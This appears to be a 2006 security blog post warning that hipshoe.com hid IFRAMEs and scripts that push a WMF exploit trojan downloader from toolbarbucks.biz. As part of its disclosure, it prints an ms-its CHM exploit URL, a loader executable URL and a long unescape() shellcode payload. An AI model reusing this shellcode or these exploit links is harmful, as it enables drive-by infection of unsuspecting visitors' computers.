It appears the correct page will load, but after a few seconds, AVG alerts to a virus, and a script file attempts to download, install, and run. The virus appears to be a .wmf exploit.
The following was reported by AVG Pro (Ver 267.14.16/225, 1/9/2006) as follows:
File Name: xpladv493[1].wmf
Discovery: Trojan horse Downloader.Agent.13.AI
Date of detection: 1/10/2006 9:21:38 AM
File Size: 15.66 KB
The above .wmf file was located in the Temporary Internet Files folder.
A report to security@google.com was submitted shortly after discovery.
Note: The thumbnail above right is a snapshot of where hipshoe is advertising on the results page.
Thanks Bill for reporting the above, its Paul replying further...
An assessment of the hipshoe.com website reveals:
Apache version 1.3.31 and PHP release 4.3.10. Could be the server has been hijacked by running an old vulnerable PHP version. That release is susceptible to a nasty XML-RPC vulnerability and possibly serves as one entry point to the server. They need to upgrade immediately.
A quick source code view reveals links to many various garbage domains and a script call to:
http://toolbarbucks.biz/dl/adv493.php
It is this link above that uses an IFRAME html tag.
This page brings up a javascript object load:
ms-its:mhtml:file://C:nosuch.mht!http://toolbarbucks.biz/dl/adv493/x.chm::/x.htm
It also loads this up thru an applet:
http://toolbarbucks.biz/dl/loaderadv493.exe
Yet there are even more IFRAME calls to the following:
http://toolbarbucks.biz/dl/fillmemadv493.htm
One particular call from another IFRAME is to xpladv493.wmf, yup, another WMF Exploit.
This page comes up in IFRAME with the following javascript snippet
mem = mem + unescape
("%uEED9%uD99B%u2474%u5EF4%uC02B%uF42D%uFFFA%u2BFF"+
"%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u58E9%uFFFB"+
"%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+
"%uC92B%uE981%uFEE7%uFFFF%u7381%uA944%u4A67%u83CD"+
"%uFCEB%uF4E2%u7541%uCD48%uEAA9%uD7FF%u67AA%u404A"+
"%uCF14%uCD4E%u8FA9%uCF25%u67A9%u4F45%u661F%uCD4A"+
"%u27C3%uCD22%u6799%uA54A%u62A5%uCD4A%u67C3%u58B5"+
"%u6369%uCD4A%uA7A2%u4945%u6633%uCD4A%uE220%uC842"+
"%u67A9%u38C1%u8F22%u35C1%u6B10%uCD4F%u94A9%u40EE"+
"%uF02C%uCD4A%u98A9%uA7AA%u0FAD%uFD4A%u67A9%uCD22"+
"%u66A9%uA74A%u98A9%u0DDF%u67AD%uC64A%u6869%uAECE"+
"%u67A8%u444A%u672C%uCD4F%uEAA9%u24CF%u67AA%u9D4A"+
"%uF256%uC9F2%u67A9%u0D41%uE3A6%uCC02%u67A9%u78C7"+
"%u643F%uCD4A%uDA24%uC99A%u67A9%u27A2%u67A8%uC24A"+
"%u562B%uCD4B%u0DA9%uA74A%u0DA9%uA74A%uEAA9%u34CF"+
"%u67AA%u9D4A%uF256%uC99A%u67A9%u0D41%uE3A6%uCC5E"+
"%u67A9%u48C3%u6345%uCD4A%u67C3%uCD20%u64C3%uCD20"+
"%u67C3%u9D20%uE224%uC901%u67A9%u461A%u8B2C%uCD4E"+
"%u37A9%u58B5%u6371%uCD4A%uA7A2%u4945%u674F%uCD4A"+
"%uE220%uC9BA%u67A9%uCC20%u67C1%u8D4A%u0DA9%uA74A"+
"%u0DA9%u404A%u0E2C%uCD4E%u37A9%u48C7%u645C%uCD4A"+
"%uECF9%u3DCF%u67AD%u9D4A%uF256%uC996%u67A9%u0D41"+
"%uE3A6%uCDFA%u67A9%u48C3%u635D%uCD4A%u67C3%uCD20"+
"%u67C3%uCD20%uE222%uC9BE%u67A9%u321A%u873C%uCD4E"+
"%u6CA9%uC28A%uEA2D%uCD4A%uEEA9%u35CF%u67AD%u404A"+
"%u9B2C%uCD4E%u37A9%u3222%u6756%u464A%u672C%uCD4F"+
"%u37A9%u48C1%u635D%uCD4A%u98F9%u19DF%u67AD%uC64A"+
"%u1369%u4696%u9B2C%uCD4E%u6CA9%uB98A%uEA7B%uD7FF"+
"%u67AA%uA54A%u66A9%uCD4A%u98FF%u05DF%u67AD%u404A"+
"%uE02C%uCD4E%u37A9%u321C%uAB3C%uCD4E%uECA9%u7592"+
"%u67AB%uCD4A%u5241%uCD4A%uECA9%uCDF7%u67AC%u464A"+
"%u9B1C%uCD4E%u8FA9%uCD03%u67A9%u48C1%u634D%uCD4A"+
"%u98F9%u79DF%u67AD%uA74A%uEAA8%uD7CF%u67AA%u9D4A"+
"%uF256%uC98E%u67A9%uCD20%uF256%uC9F6%u67A9%uA72A"+
"%u0FA9%uCDCA%u67A9%uA71A%u0DA9%uA549%u67A9%u0D4A"+
"%u98FA%u65DF%u67AD%u444A%u832C%uCD4E%uEEA9%uE90E"+
"%u06B5%uAD89%u67C3%u9B1E%u98FE%u29FF%u67AD%u324A"+
"%uD73C%uCD4E%uEEA9%uE90E%u06B5%uAD89%u00CD%uCDEB"+
"%u27A9%u46D9%u98EA%uB80A%uEC50%uCE11%uF4CF%u4C2C"+
"%u2A92%uB910%uE6B3%uCDA1%u66A9%uAB4A%u5C28%u9707"+
"%u6ADD%u26CB%u67A9%uCD4B%uE6CF%u8071%u12F3%u44B9"+
"%u43F5%uAC56%u076A%u1F79%uE7FF%uCD74%u75DD%uB9EC"+
"%u2551%u9C71%u10B1%uFE5C%u2869%uB8E4%u3954%u25A1"+
"%uEEEF%uE93E%uEEA1%uE91E%u9F89%uAC12%u9E6A%u0A12"+
"%u43ED%uCD56%u67A9%uAC4A%u076A%u15C1%u2C22%u4676"+
"%u6CE5%uCE32%uEC62%uED1B%uB4AA%uF7C1%u9CAA%uA71D"+
"%u8F56%u32E5%u9856%uE038%u20F6%u461D%u43F8%u1E49"+
"%uD0A6%u8F5E%u2622%uCE56%uEC6A%u5D4E%uA4AA%u461C"+
"%u43DD%u4446%uD9AD%u4614%u43D5%u4D4E%u6797%u1C3F"+
"%u3FF1%uACB2%u9E6A%u9512%uA4C8%uBF09%u06CC%uA83E"+
"%u0EEF%uA826%u67E8%uA819%u21DD%uA123%u37CC%uA425"+
"%u13C7%uBF2F%u30A9%uA438%u02DD%uA40C%u02C5%u8E4A"+
"%u08C5%uA839%u06E1%uA924%u02C5%u814A%u06C6%u812E"+
"%u05C0%uAC38%u1EDB%uCD0B%u1FEC%uB923%u15F9%uAE25"+
"%u14CC%uCD39%u0EFF%uB938%u06DC%u8C26%u0BC5%uAE25"+
"%u30A9%uA323%u1FEC%uAE2F%u20A9%uB92F%u1EFA%uB939"+
"%u0ACC%uA40E%u02DB%uB929%u15C6%u8C33%u0BA9%uB939"+
"%u04DB%uB92B%u67A9%uA303%u02DD%uA338%u13CC%uBD05"+
"%u09CC%uCD0B%u09E0%uA83E%u09DB%uB92F%u02FB%uA92B"+
"%u0EEF%uA826%u2EA9%uB924%u15CC%uA824%u24DD%uA325"+
"%u02C7%uB929%u67E8%uB902%u17DD%uBD05%u09CC%uA818"+
"%u12D8%uBE2F%u26DD%u854A%u13DD%u9E3A%u09CC%u9F2E"+
"%u16CC%uA83F%u13DA%uCD0B%u10A9%uA323%u09C0%uB92F"+
"%u0387%uA126%u20A9%u990F%u2AA9%uB725%u0BC0%uAC26"+
"%u5386%uFD64%u4F89%uA229%u17C4%uB92B%u05C0%uA826"+
"%u4792%u9E07%u22E0%uFB6A%u5787%uED71%u0EFE%uA924"+
"%u10C6%uED39%u33E7%uF86A%u5687%uED71%u31FA%uF67B"+
"%u2A89%u8433%u55EC%uED71%u2987%u990F%u2489%u9F06"+
"%u5689%uFC64%u5387%uFF79%u4E9B%uB94A%u08C6%uAF26"+
"%u15C8%uB828%u0CCA%uE339%u0ECB%uCD30%u67A9%uCD4A"+
"%u67A9%uCD4A%u67A9%uCD4A%u48A9%uA12E%u0B86%uAC25"+
"%u02CD%uAC38%u11CD%uF47E%u499A%uB52F%u67CC%uCD4A"+
"%u67A9%uCD4A%u67A9%u914A%u04DA%uB927%u5198%uA864"+
"%u02D1%uCD4A%u67A9%uCD4A%u67A9%uCD4A%u67A9%uCD4A"+
"%u67A9%uCD4A%uEAA9%uCD03")
toolbarbucks.biz, sound familiar? Sure, webhelper has already identified this domain in December 2005 and called to action for immediate blocking.
Some of the junk domains hipshoe.com links to:
tkqlhce.com
dpbolvw.net
jdoqocy.com
anrdoezrs.net
kqzyfj.com
Don't visit these pages! I did and saw some alerts and prompts:
Visiting the main site www.hipshoe.com one sees this innocuous looking page (click all images to enlarge):
Yet its not benign. It spawns all sorts of IFRAME and script calls to bring down various nasties and behavior:
A couple of virus detections:
The following IE prompt comes up multiple times (clicking cancel) [note, this comes from the code snippet above]:
Once gone, this alert comes up:
Update: A check on the event viewer for application revealed nine instances of the following Information:
Don't permit any kind of scripting to be run without first being prompted. One thing you should do is ensure you have IFRAME program launching set to disable or prompt under Tools|Internet Options:
Thanks go out to Bill Bright and his wife for finding this and reporting it here and to Google. Big thanks out to webhelper (Patrick Jordan) for putting out the huge alert on toolbarbucks.biz. Block all your access to that domain!
Go to your hosts file and enter it:
127.0.0.1 toolbarbucks.biz
Spread the word! Knowledge is power.
Note: Warning, do not visit any of the domains listed in this article.
Updated: 1746 hrs UTC-5. Added an event viewer information dialogue.
"
